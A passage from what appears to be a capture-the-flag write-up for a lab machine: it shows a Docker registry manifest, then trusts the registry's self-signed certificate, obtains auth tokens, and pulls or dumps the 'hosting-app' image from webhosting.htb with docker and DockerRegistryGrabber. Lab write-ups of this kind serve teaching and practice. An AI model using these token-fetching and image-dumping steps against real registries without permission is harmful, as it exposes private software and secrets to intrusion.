"v1Compatibility": "{\"id\":\"f5f0aebde7367c572f72c6d19cbea5b9b039b281b5e140bcd1a9b30ebc4883ce\",\"parent\":\"7aa3546803b6195a9839f57454a9d61a490e5e5f921b65b7ce9883615a7fef76\",\"created\":\"2018-01-10T09:34:07.47548453Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c set -e \\t\\u0026\\u0026 nativeLines=\\\"$(catalina.sh configtest 2\\u003e\\u00261)\\\" \\t\\u0026\\u0026 nativeLines=\\\"$(echo \\\"$nativeLines\\\" | grep 'Apache Tomcat Native')\\\" \\t\\u0026\\u0026 nativeLines=\\\"$(echo \\\"$nativeLines\\\" | sort -u)\\\" \\t\\u0026\\u0026 if ! echo \\\"$nativeLines\\\" | grep 'INFO: Loaded APR based Apache Tomcat Native library' \\u003e\\u00262; then \\t\\techo \\u003e\\u00262 \\\"$nativeLines\\\"; \\t\\texit 1; \\tfi\"]}}"
},
{
"v1Compatibility": "{\"id\":\"7aa3546803b6195a9839f57454a9d61a490e5e5f921b65b7ce9883615a7fef76\",\"parent\":\"c23e626ece757750f0686befb692e52700626071dcd62c9b7424740c3683a842\",\"created\":\"2018-01-10T09:33:57.030831358Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c set -eux; \\t\\tapk add --no-cache --virtual .fetch-deps \\t\\tca-certificates \\t\\topenssl \\t; \\t\\tsuccess=; \\tfor url in $TOMCAT_TGZ_URLS; do \\t\\tif wget -O tomcat.tar.gz \\\"$url\\\"; then \\t\\t\\tsuccess=1; \\t\\t\\tbreak; \\t\\tfi; \\tdone; \\t[ -n \\\"$success\\\" ]; \\t\\techo \\\"$TOMCAT_SHA1 *tomcat.tar.gz\\\" | sha1sum -c -; \\t\\tsuccess=; \\tfor url in $TOMCAT_ASC_URLS; do \\t\\tif wget -O tomcat.tar.gz.asc \\\"$url\\\"; then \\t\\t\\tsuccess=1; \\t\\t\\tbreak; \\t\\tfi; \\tdone; \\t[ -n \\\"$success\\\" ]; \\t\\tgpg --batch --verify tomcat.tar.gz.asc tomcat.tar.gz; \\ttar -xvf tomcat.tar.gz --strip-components=1; \\trm bin/*.bat; \\trm tomcat.tar.gz*; \\t\\tnativeBuildDir=\\\"$(mktemp -d)\\\"; \\ttar -xvf bin/tomcat-native.tar.gz -C \\\"$nativeBuildDir\\\" --strip-components=1; \\tapk add --no-cache --virtual .native-build-deps \\t\\tapr-dev \\t\\tcoreutils \\t\\tdpkg-dev dpkg \\t\\tgcc \\t\\tlibc-dev \\t\\tmake \\t\\t\\\"openjdk${JAVA_VERSION%%[-~bu]*}\\\"=\\\"$JAVA_ALPINE_VERSION\\\" \\t\\topenssl-dev \\t; \\t( \\t\\texport CATALINA_HOME=\\\"$PWD\\\"; \\t\\tcd \\\"$nativeBuildDir/native\\\"; \\t\\tgnuArch=\\\"$(dpkg-architecture --query DEB_BUILD_GNU_TYPE)\\\"; \\t\\t./configure \\t\\t\\t--build=\\\"$gnuArch\\\" \\t\\t\\t--libdir=\\\"$TOMCAT_NATIVE_LIBDIR\\\" \\t\\t\\t--prefix=\\\"$CATALINA_HOME\\\" \\t\\t\\t--with-apr=\\\"$(which apr-1-config)\\\" \\t\\t\\t--with-java-home=\\\"$(docker-java-home)\\\" \\t\\t\\t--with-ssl=yes; \\t\\tmake -j \\\"$(nproc)\\\"; \\t\\tmake install; \\t); \\trunDeps=\\\"$( \\t\\tscanelf --needed --nobanner --format '%n#p' --recursive \\\"$TOMCAT_NATIVE_LIBDIR\\\" \\t\\t\\t| tr ',' '\\\\n' \\t\\t\\t| sort -u \\t\\t\\t| awk 'system(\\\"[ -e 
/usr/local/lib/\\\" $1 \\\" ]\\\") == 0 { next } { print \\\"so:\\\" $1 }' \\t)\\\"; \\tapk add --virtual .tomcat-native-rundeps $runDeps; \\tapk del .fetch-deps .native-build-deps; \\trm -rf \\\"$nativeBuildDir\\\"; \\trm bin/tomcat-native.tar.gz; \\t\\tapk add --no-cache bash; \\tfind ./bin/ -name '*.sh' -exec sed -ri 's|^#!/bin/sh$|#!/usr/bin/env bash|' '{}' +\"]}}"
},
{
"v1Compatibility": "{\"id\":\"c23e626ece757750f0686befb692e52700626071dcd62c9b7424740c3683a842\",\"parent\":\"ba737ee0cd9073e2003dbc41ebaa4ac347a9da8713ee3cdd18c9099c71d715d7\",\"created\":\"2018-01-10T09:33:33.620084689Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ENV TOMCAT_ASC_URLS=https://www.apache.org/dyn/closer.cgi?action=download\\u0026filename=tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz.asc \\thttps://www-us.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz.asc \\thttps://www.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz.asc \\thttps://archive.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz.asc\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"ba737ee0cd9073e2003dbc41ebaa4ac347a9da8713ee3cdd18c9099c71d715d7\",\"parent\":\"67f844d01db77d9e5e9bdc5c154a8d40bdfe8ec30f2c0aa6c199448aab75f94e\",\"created\":\"2018-01-10T09:33:33.366948345Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ENV TOMCAT_TGZ_URLS=https://www.apache.org/dyn/closer.cgi?action=download\\u0026filename=tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz \\thttps://www-us.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz \\thttps://www.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz \\thttps://archive.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"67f844d01db77d9e5e9bdc5c154a8d40bdfe8ec30f2c0aa6c199448aab75f94e\",\"parent\":\"61e9c45c309801f541720bb694574780aaf3f9c9ba939afd3a2248f921257e2b\",\"created\":\"2018-01-10T09:33:33.130789837Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ENV TOMCAT_SHA1=b59e1d658a4edbca7a81d12fd6f20203a4da9743\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"61e9c45c309801f541720bb694574780aaf3f9c9ba939afd3a2248f921257e2b\",\"parent\":\"7aa678f161898c0b2fb24800833ec8a88e29662a4aeb73d9fd09f0f3e2880638\",\"created\":\"2018-01-10T09:33:32.902199138Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ENV TOMCAT_VERSION=9.0.2\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"7aa678f161898c0b2fb24800833ec8a88e29662a4aeb73d9fd09f0f3e2880638\",\"parent\":\"d436c875c4061e0058d744bb26561bc738cba69b135416d441401faeb47b558c\",\"created\":\"2018-01-10T09:33:32.656603152Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ENV TOMCAT_MAJOR=9\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"d436c875c4061e0058d744bb26561bc738cba69b135416d441401faeb47b558c\",\"parent\":\"15ee0d244e69dcb1e0ff2817e31071a18a7352ae4e5bb1765536a831bf69ecfc\",\"created\":\"2018-01-10T09:33:29.658955433Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c set -ex; \\tfor key in $GPG_KEYS; do \\t\\tgpg --keyserver ha.pool.sks-keyservers.net --recv-keys \\\"$key\\\"; \\tdone\"]}}"
},
{
"v1Compatibility": "{\"id\":\"15ee0d244e69dcb1e0ff2817e31071a18a7352ae4e5bb1765536a831bf69ecfc\",\"parent\":\"ff0264281c2fadd4108ccac96ddce82587bc26666b918f31bcb43b7ef73c65e8\",\"created\":\"2018-01-10T09:33:20.722817917Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ENV GPG_KEYS=05AB33110949707C93A279E3D3EFE6B686867BA6 07E48665A34DCAFAE522E5E6266191C37C037D42 47309207D818FFD8DCD3F83F1931D684307A10A5 541FBE7D8F78B25E055DDEE13C370389288584E7 61B832AC2F1C5A90F0F9B00A1C506407564C17A3 79F7026C690BAA50B92CD8B66A3AD3F4F22C4FED 9BA44C2621385CB966EBA586F72C284D731FABEE A27677289986DB50844682F8ACB77FC2E86E29AC A9C5DF4D22E99998D9875A5110C01C5A2F6059E7 DCFD35E0BF8CA7344752DE8B6FB21E8933C60243 F3A04C595DB5B6A5F1ECA43E3B7BBB100D811BBE F7DA48BB64BCB84ECBA7EE6935CD23C10D498E23\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"ff0264281c2fadd4108ccac96ddce82587bc26666b918f31bcb43b7ef73c65e8\",\"parent\":\"4d9c918fda475437138013a0cf2e0c9086e7c1ed8190c1a0cef8d2b882937428\",\"created\":\"2018-01-10T09:29:11.265649726Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c apk add --no-cache gnupg\"]}}"
},
{
"v1Compatibility": "{\"id\":\"4d9c918fda475437138013a0cf2e0c9086e7c1ed8190c1a0cef8d2b882937428\",\"parent\":\"7577bdb4d1f873242bef6582d26031cdea0a64cccf8f8608a8c07cb3cc74611e\",\"created\":\"2018-01-10T09:29:07.609109611Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ENV LD_LIBRARY_PATH=/usr/local/tomcat/native-jni-lib\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"7577bdb4d1f873242bef6582d26031cdea0a64cccf8f8608a8c07cb3cc74611e\",\"parent\":\"839af1242b7dcef37994affedfee3e2c52246e521ac101e703737fc0164cdf5c\",\"created\":\"2018-01-10T09:29:07.376174727Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ENV TOMCAT_NATIVE_LIBDIR=/usr/local/tomcat/native-jni-lib\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"839af1242b7dcef37994affedfee3e2c52246e521ac101e703737fc0164cdf5c\",\"parent\":\"ea6f6f5cf5c076bca613117419ab5c2d591798dc146fa25b1ab5f77dadf35a0c\",\"created\":\"2018-01-10T09:29:07.155029096Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) WORKDIR /usr/local/tomcat\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"ea6f6f5cf5c076bca613117419ab5c2d591798dc146fa25b1ab5f77dadf35a0c\",\"parent\":\"c55835e0e7564582d31203616f363dfb303cab260c1a6dec9a2a0329a8e27b81\",\"created\":\"2018-01-10T09:29:06.890891119Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c mkdir -p \\\"$CATALINA_HOME\\\"\"]}}"
},
{
"v1Compatibility": "{\"id\":\"c55835e0e7564582d31203616f363dfb303cab260c1a6dec9a2a0329a8e27b81\",\"parent\":\"32c57341ccdca27052b71277715b86f2c0ad436ac493bb79467a8df664379ba9\",\"created\":\"2018-01-10T09:29:06.087097667Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ENV PATH=/usr/local/tomcat/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/jvm/java-1.8-openjdk/jre/bin:/usr/lib/jvm/java-1.8-openjdk/bin\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"32c57341ccdca27052b71277715b86f2c0ad436ac493bb79467a8df664379ba9\",\"parent\":\"c54559a23f245bd25ad627150eaadb1e99a60811ad2955e6a747f2a59b09b22b\",\"created\":\"2018-01-10T09:29:05.864118034Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ENV CATALINA_HOME=/usr/local/tomcat\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"c54559a23f245bd25ad627150eaadb1e99a60811ad2955e6a747f2a59b09b22b\",\"parent\":\"86a2c94b64bc779ec79acaa9f0ab00dff4a664d23f7546330a3165f1137cd596\",\"created\":\"2018-01-10T04:52:04.664605562Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c set -x \\t\\u0026\\u0026 apk add --no-cache \\t\\topenjdk8-jre=\\\"$JAVA_ALPINE_VERSION\\\" \\t\\u0026\\u0026 [ \\\"$JAVA_HOME\\\" = \\\"$(docker-java-home)\\\" ]\"]}}"
},
{
"v1Compatibility": "{\"id\":\"86a2c94b64bc779ec79acaa9f0ab00dff4a664d23f7546330a3165f1137cd596\",\"parent\":\"8ad7d8482d05498820d3256b0ba7eeaf21b8e7ab63044a4bce65116a5dac6a49\",\"created\":\"2018-01-10T04:51:57.540527702Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ENV JAVA_ALPINE_VERSION=8.151.12-r0\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"8ad7d8482d05498820d3256b0ba7eeaf21b8e7ab63044a4bce65116a5dac6a49\",\"parent\":\"55332c2663c5991fc04851d7980056a37cf2d703e90ef658fd8adccd947f5ca1\",\"created\":\"2018-01-10T04:51:57.314525921Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ENV JAVA_VERSION=8u151\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"55332c2663c5991fc04851d7980056a37cf2d703e90ef658fd8adccd947f5ca1\",\"parent\":\"3f24ff911184223f9c7e0b260cce136bc9cededdbdce79112e2a84e4c34bb568\",\"created\":\"2018-01-10T04:51:57.072315887Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ENV PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/jvm/java-1.8-openjdk/jre/bin:/usr/lib/jvm/java-1.8-openjdk/bin\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"3f24ff911184223f9c7e0b260cce136bc9cededdbdce79112e2a84e4c34bb568\",\"parent\":\"0ed181ef14afa5947383aaa2644e5ece84fb1a70f3156708709f2d04b6a6ec9e\",\"created\":\"2018-01-10T04:51:56.850972184Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ENV JAVA_HOME=/usr/lib/jvm/java-1.8-openjdk/jre\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"0ed181ef14afa5947383aaa2644e5ece84fb1a70f3156708709f2d04b6a6ec9e\",\"parent\":\"5a545e9783766d38b2d99784c9d9bf5ed547bf48e1a293059b4cc7f27dd34b31\",\"created\":\"2018-01-10T04:48:25.431215554Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c { \\t\\techo '#!/bin/sh'; \\t\\techo 'set -e'; \\t\\techo; \\t\\techo 'dirname \\\"$(dirname \\\"$(readlink -f \\\"$(which javac || which java)\\\")\\\")\\\"'; \\t} \\u003e /usr/local/bin/docker-java-home \\t\\u0026\\u0026 chmod +x /usr/local/bin/docker-java-home\"]}}"
},
{
"v1Compatibility": "{\"id\":\"5a545e9783766d38b2d99784c9d9bf5ed547bf48e1a293059b4cc7f27dd34b31\",\"parent\":\"2dea27bce7d674e8140e0378fe5a51157011109d9da593bab1ecf86c93595292\",\"created\":\"2018-01-10T04:48:24.510692074Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ENV LANG=C.UTF-8\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"2dea27bce7d674e8140e0378fe5a51157011109d9da593bab1ecf86c93595292\",\"parent\":\"28a0c8bbcab32237452c3dadfb8302a6fab4f6064be2d858add06a7be8c32924\",\"created\":\"2018-01-09T21:10:58.579708634Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) CMD [\\\"/bin/sh\\\"]\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"28a0c8bbcab32237452c3dadfb8302a6fab4f6064be2d858add06a7be8c32924\",\"created\":\"2018-01-09T21:10:58.365737589Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ADD file:093f0723fa46f6cdbd6f7bd146448bb70ecce54254c35701feeceb956414622f in / \"]}}"
}
],
"signatures": [
{
"header": {
"jwk": {
"crv": "P-256",
"kid": "DBHZ:D6NK:J5GS:GEVJ:BWFA:4NJI:YQBD:KXGX:473R:INFC:IXXE:L4I7",
"kty": "EC",
"x": "QAwE4s7YC2ERVKhnsAKWw-_-eZ02Gq_hFZg-HnS4CKI",
"y": "TJbTTepB1svg01bhwejAvUx4udrM8t0TJLbjyoAP4PY"
},
"alg": "ES256"
},
"signature": "P35ij5ZzA5u0HV4T9h4yRluf0Sj_E2-E5GbsX1UNjA9ZzYPXFmw5MKLYZWm0UrhlVmfb5-0M5icrewFri1NTNA",
"protected": "eyJmb3JtYXRMZW5ndGgiOjI2MDkxLCJmb3JtYXRUYWlsIjoiQ24wIiwidGltZSI6IjIwMjQtMDEtMjdUMTY6MTI6MDNaIn0"
}
]
}
There’s a ton here. The top has a key, fsLayers
, which is a list of blobSum
objects, each a sha256 hash. Each hash identifies a layer of the image, containing part of the file system as a diff from the previous layer. They can be downloaded from /v2/[repository]/blobs/sha256:[hash]
.
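The manifest parsing can be sketched in a few lines: given a manifest shaped like the one above, collect the unique blobSum digests and build the blob URLs. The manifest here is a tiny inline stand-in, not the real one:

```python
import json

# Tiny stand-in manifest with the same shape as the registry's real one
manifest = json.loads('''{
  "name": "hosting-app",
  "fsLayers": [
    {"blobSum": "sha256:aaaa"},
    {"blobSum": "sha256:bbbb"},
    {"blobSum": "sha256:aaaa"}
  ]
}''')

registry = "https://webhosting.htb:5000"

# Deduplicate digests (the real manifest repeats the empty layer many times)
digests = sorted({layer["blobSum"] for layer in manifest["fsLayers"]})
urls = [f"{registry}/v2/{manifest['name']}/blobs/{digest}" for digest in digests]
for url in urls:
    print(url)
```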
Still, there’s no reason to manually do this.
If I try to fetch the image with docker
, it complains of untrusted certificates:
oxdf@hacky$ docker pull webhosting.htb:5000/hosting-app:latest
Error response from daemon: Get "https://webhosting.htb:5000/v2/": tls: failed to verify certificate: x509: certificate signed by unknown authority
I’ll fetch the certificate with openssl
:
oxdf@hacky$ echo | openssl s_client -showcerts -connect webhosting.htb:5000
CONNECTED(00000003)
depth=0 C = CN, ST = GD, L = SZ, O = "Acme, Inc.", CN = *.webhosting.htb
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 C = CN, ST = GD, L = SZ, O = "Acme, Inc.", CN = *.webhosting.htb
verify error:num=21:unable to verify the first certificate
verify return:1
depth=0 C = CN, ST = GD, L = SZ, O = "Acme, Inc.", CN = *.webhosting.htb
verify return:1
---
Certificate chain
0 s:C = CN, ST = GD, L = SZ, O = "Acme, Inc.", CN = *.webhosting.htb
i:C = CN, ST = GD, L = SZ, O = "Acme, Inc.", CN = Acme Root CA
a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
v:NotBefore: Mar 26 21:32:06 2023 GMT; NotAfter: Mar 25 21:32:06 2024 GMT
-----BEGIN CERTIFICATE-----
MIIDZTCCAk2gAwIBAgIUCxIhdntb6QD+EHgpbvOABhwIvbEwDQYJKoZIhvcNAQEL
BQAwUzELMAkGA1UEBhMCQ04xCzAJBgNVBAgMAkdEMQswCQYDVQQHDAJTWjETMBEG
A1UECgwKQWNtZSwgSW5jLjEVMBMGA1UEAwwMQWNtZSBSb290IENBMB4XDTIzMDMy
NjIxMzIwNloXDTI0MDMyNTIxMzIwNlowVzELMAkGA1UEBhMCQ04xCzAJBgNVBAgM
AkdEMQswCQYDVQQHDAJTWjETMBEGA1UECgwKQWNtZSwgSW5jLjEZMBcGA1UEAwwQ
Ki53ZWJob3N0aW5nLmh0YjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
ALeRMWQ61f5GKstmqYMCtPBSf5l6xvAuQX4JX+8DpdNEuEOZ0gUu/EYU8nbJ0kH7
nwqplA7V5HCEVe/pPwRNedi9vb+qSzKxlESMrJq8lZOLjgx3sfczUspR+d14Ht63
DAijLGNBzgx027OQEcgd/h34SPEWt1XWSrSVtaJeFXAMqsPaBM2gco9ABI8j+3ki
SOespRQKNzLvJN+JWtxxHe9gxJfzRRcCH3R36ayg5jIWBa3Igo9IIzEu+364e0OL
Y6HoEX/+0Ly73v/mpei4wPay6kri1ay2mzYVfjF5WRbKFgzEZDXEAUpXLeLNMmrU
hOAaG32abKFAK3lMP6L99/0CAwEAAaMtMCswKQYDVR0RBCIwIIIOd2ViaG9zdGlu
Zy5odGKCDndlYmhvc3RpbmcuaHRiMA0GCSqGSIb3DQEBCwUAA4IBAQAQsJBESlH/
xfYbsOdsx/zm/XZbW4p0D/3V9KvSTOORcn8LPF4vFNqwJIckbTiYPM3LKSSc5r/Z
dlGnOEdKB1s3uR5kyDMy0PgHEHTdrLZCadJYIa1Z37Cc8E6zPP4SSobQo3jCifD9
FwOW4jfMtgnHiJ4PViP/9O9WuBmTqLyPbZT402V+vaEwtzcSNcp6l/dKAzyjdz+9
i9OPJGi1X2mvpVwqZhtWm2VwOjgpeVkg7XKmsyJ72/3BNN8S99PrkVpqGOjEn7OQ
c6Au7Eac1LeujFpXPQvzar8FszUIzojBPJAvWEVh2ChKahANEyWDqWxsLKF5oYy/
HgNmV9Z6pHxq
-----END CERTIFICATE-----
---
Server certificate
subject=C = CN, ST = GD, L = SZ, O = "Acme, Inc.", CN = *.webhosting.htb
issuer=C = CN, ST = GD, L = SZ, O = "Acme, Inc.", CN = Acme Root CA
---
No client certificate CA names sent
Peer signing digest: SHA256
Peer signature type: RSA-PSS
Server Temp Key: X25519, 253 bits
---
SSL handshake has read 1413 bytes and written 380 bytes
Verification error: unable to verify the first certificate
---
New, TLSv1.3, Cipher is TLS_AES_128_GCM_SHA256
Server public key is 2048 bit
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
Early data was not sent
Verify return code: 21 (unable to verify the first certificate)
---
---
Post-Handshake New Session Ticket arrived:
SSL-Session:
Protocol : TLSv1.3
Cipher : TLS_AES_128_GCM_SHA256
Session-ID: 712661C884FCB118ED308AFADD1AFA809738B5A923961E3A4F02FF72DF2C34CE
Session-ID-ctx:
Resumption PSK: AE4BDF83CD578637D838D8AA0E1E3B22E376F7DDA6B717A862A5E63FB24EE2A5
PSK identity: None
PSK identity hint: None
SRP username: None
TLS session ticket lifetime hint: 604800 (seconds)
TLS session ticket:
0000 - df 90 66 da 1f f8 97 20-9a 7c f4 8c ee 04 a7 39 ..f.... .|.....9
0010 - 04 64 a9 f6 ae 8e 97 7a-3b 5c 36 5b bf 8b 3f e1 .d.....z;\6[..?.
0020 - 15 f4 c6 ab 9d 62 48 c6-15 9f 83 f2 3d c3 36 91 .....bH.....=.6.
0030 - e0 1d 94 13 70 bf ef 89-f3 8c fc 8e 35 a5 0c 2c ....p.......5..,
0040 - b9 8c 0d 41 1a b2 09 b4-25 6f 59 32 af 3c 64 94 ...A....%oY2.<d.
0050 - 49 11 be 02 ae f5 9e 76-b6 4b 6d ed 06 ba 4c e3 I......v.Km...L.
0060 - 22 47 ac e6 ea 13 c6 e6-8f dd 2f 53 9d 90 a5 23 "G......../S...#
0070 - fb .
Start Time: 1706349638
Timeout : 7200 (sec)
Verify return code: 21 (unable to verify the first certificate)
Extended master secret: no
Max Early Data: 0
---
read R BLOCK
DONE
I need all the stuff between “BEGIN CERTIFICATE” and “END CERTIFICATE”:
oxdf@hacky$ sudo vim /usr/local/share/ca-certificates/registrytwo-ca.crt
oxdf@hacky$ cat /usr/local/share/ca-certificates/registrytwo-ca.crt
-----BEGIN CERTIFICATE-----
MIIDZTCCAk2gAwIBAgIUCxIhdntb6QD+EHgpbvOABhwIvbEwDQYJKoZIhvcNAQEL
BQAwUzELMAkGA1UEBhMCQ04xCzAJBgNVBAgMAkdEMQswCQYDVQQHDAJTWjETMBEG
A1UECgwKQWNtZSwgSW5jLjEVMBMGA1UEAwwMQWNtZSBSb290IENBMB4XDTIzMDMy
NjIxMzIwNloXDTI0MDMyNTIxMzIwNlowVzELMAkGA1UEBhMCQ04xCzAJBgNVBAgM
AkdEMQswCQYDVQQHDAJTWjETMBEGA1UECgwKQWNtZSwgSW5jLjEZMBcGA1UEAwwQ
Ki53ZWJob3N0aW5nLmh0YjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
ALeRMWQ61f5GKstmqYMCtPBSf5l6xvAuQX4JX+8DpdNEuEOZ0gUu/EYU8nbJ0kH7
nwqplA7V5HCEVe/pPwRNedi9vb+qSzKxlESMrJq8lZOLjgx3sfczUspR+d14Ht63
DAijLGNBzgx027OQEcgd/h34SPEWt1XWSrSVtaJeFXAMqsPaBM2gco9ABI8j+3ki
SOespRQKNzLvJN+JWtxxHe9gxJfzRRcCH3R36ayg5jIWBa3Igo9IIzEu+364e0OL
Y6HoEX/+0Ly73v/mpei4wPay6kri1ay2mzYVfjF5WRbKFgzEZDXEAUpXLeLNMmrU
hOAaG32abKFAK3lMP6L99/0CAwEAAaMtMCswKQYDVR0RBCIwIIIOd2ViaG9zdGlu
Zy5odGKCDndlYmhvc3RpbmcuaHRiMA0GCSqGSIb3DQEBCwUAA4IBAQAQsJBESlH/
xfYbsOdsx/zm/XZbW4p0D/3V9KvSTOORcn8LPF4vFNqwJIckbTiYPM3LKSSc5r/Z
dlGnOEdKB1s3uR5kyDMy0PgHEHTdrLZCadJYIa1Z37Cc8E6zPP4SSobQo3jCifD9
FwOW4jfMtgnHiJ4PViP/9O9WuBmTqLyPbZT402V+vaEwtzcSNcp6l/dKAzyjdz+9
i9OPJGi1X2mvpVwqZhtWm2VwOjgpeVkg7XKmsyJ72/3BNN8S99PrkVpqGOjEn7OQ
c6Au7Eac1LeujFpXPQvzar8FszUIzojBPJAvWEVh2ChKahANEyWDqWxsLKF5oYy/
HgNmV9Z6pHxq
-----END CERTIFICATE-----
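Rather than copy/paste into vim, that extraction can be scripted. A minimal sketch, working on a trimmed sample of the s_client output (in practice the full output would be piped in and the PEM written into /usr/local/share/ca-certificates/):

```python
import re

# Trimmed sample of `openssl s_client -showcerts` output
s_client_output = """\
CONNECTED(00000003)
Certificate chain
 0 s:C = CN, ST = GD, L = SZ, O = "Acme, Inc.", CN = *.webhosting.htb
-----BEGIN CERTIFICATE-----
MIIDZTCCAk2gAwIBAgIU(trimmed)
-----END CERTIFICATE-----
---
Server certificate
"""

# Grab everything from BEGIN to END CERTIFICATE, inclusive of the markers
match = re.search(
    r"-----BEGIN CERTIFICATE-----.*?-----END CERTIFICATE-----",
    s_client_output,
    re.DOTALL,
)
pem = match.group(0)
print(pem)
```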
Now I’ll run update-ca-certificates
and restart the docker service:
oxdf@hacky$ sudo update-ca-certificates
Updating certificates in /etc/ssl/certs...
0 added, 0 removed; done.
Running hooks in /etc/ca-certificates/update.d...
Adding debian:registrytwo-ca.pem
done.
Updating Mono key store
Mono Certificate Store Sync - version 6.8.0.105
Populate Mono certificate store from a concatenated list of certificates.
Copyright 2002, 2003 Motus Technologies. Copyright 2004-2008 Novell. BSD licensed.
Importing into legacy system store:
I already trust 138, your new list has 138
Import process completed.
Importing into BTLS system store:
I already trust 137, your new list has 138
Certificate added: C=ES, CN=Autoridad de Certificacion Firmaprofesional CIF A62634068
1 new root certificates were added to your trust store.
Import process completed.
Done
done.
oxdf@hacky$ sudo service docker restart
Now, when I run docker pull
, it’s smart enough to visit port 5001, get the auth it needs, and pull the image:
oxdf@hacky$ docker pull webhosting.htb:5000/hosting-app:latest
latest: Pulling from hosting-app
ff3a5c916c92: Pull complete
5de5f69f42d7: Pull complete
fa7536dd895a: Pull complete
7b43ca85cb2c: Pull complete
0da484dfb061: Pull complete
e4cc5f625cda: Pull complete
497760bf469e: Pull complete
f7b708f947c3: Pull complete
ab55eca3206e: Pull complete
9d5bcc17fed8: Pull complete
396c4a404488: Pull complete
b5ac54f57d23: Pull complete
9e700b74cc5b: Pull complete
4a19a05f49c2: Pull complete
0bf45c325a69: Pull complete
Digest: sha256:392c6c733e7dab7516f8519f669ad6dc867c4587b9c32ffecff194a77fb0af5b
Status: Downloaded newer image for webhosting.htb:5000/hosting-app:latest
webhosting.htb:5000/hosting-app:latest
I can also save a copy of the app locally:
oxdf@hacky$ docker save webhosting.htb:5000/hosting-app:latest > hosting-app.tar
oxdf@hacky$ file hosting-app.tar
hosting-app.tar: POSIX tar archive
It’s not important for solving the box, but I was curious how docker
got auth without my telling it, which I’ll explore in this video:
There are tools out there designed to pull Docker images from registries. DockerRegistryGrabber is a nice one. It’s worth noting that at the release of RegistryTwo it did not support using auth tokens, but it seems the box may have influenced adding that feature:
It doesn’t seem to be smart like docker
about getting the auth token on its own, but I can pass it one manually. With the catalog token, it will list the repositories:
(venv) oxdf@hacky$ TOKEN=$(curl -sk 'https://webhosting.htb:5001/auth?service=Docker+registry&scope=registry:catalog:*' | jq -r .token)
(venv) oxdf@hacky$ python drg.py https://webhosting.htb -A $TOKEN --list
[+] hosting-app
That same token will fail to download, but after switching to a repository-scoped token (requested just like above), it will get all the blobs:
(venv) oxdf@hacky$ python drg.py https://webhosting.htb -A $TOKEN --dump hosting-app
[+] BlobSum found 36
[+] Dumping hosting-app
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : 0bf45c325a696381eea5176baa1c8e84fbf0fe5e2ddf96a22422b10bf879d0ba
